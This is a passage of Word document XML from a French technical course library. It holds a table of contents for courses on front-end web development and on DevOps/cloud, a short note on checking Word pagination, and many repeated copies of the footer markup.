            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Page de départ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cours 1 — Développement web front-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7F9"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cours 2 — DevOps, cloud et fiabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7F9"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>417</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Annexes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>819</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La pagination de Word peut varier de quelques pages selon les polices installées, la version du logiciel et les paramètres d'imprimante. Les mesures de contrôle et les conditions de vérification sont documentées dans le fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docs/PAGINATION.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> du dépôt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pour vérifier le nombre de pages d'un cours dans Word : placez le curseur au début du cours, notez le numéro affiché dans la barre d'état ; faites de même au début du cours suivant ; la différence donne le nombre de pages du cours, page de titre comprise.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:headerReference w:type="default" r:id="rId153"/>
      <w:footerReference w:type="default" r:id="rId154"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="65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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
